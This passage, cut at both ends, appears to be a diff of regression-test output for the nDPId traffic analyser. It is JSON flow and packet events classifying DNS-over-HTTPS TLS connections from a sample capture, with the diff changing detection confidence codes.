{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+r
4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRM
SJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbwHD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2
O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKmoMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa
1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YEVOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
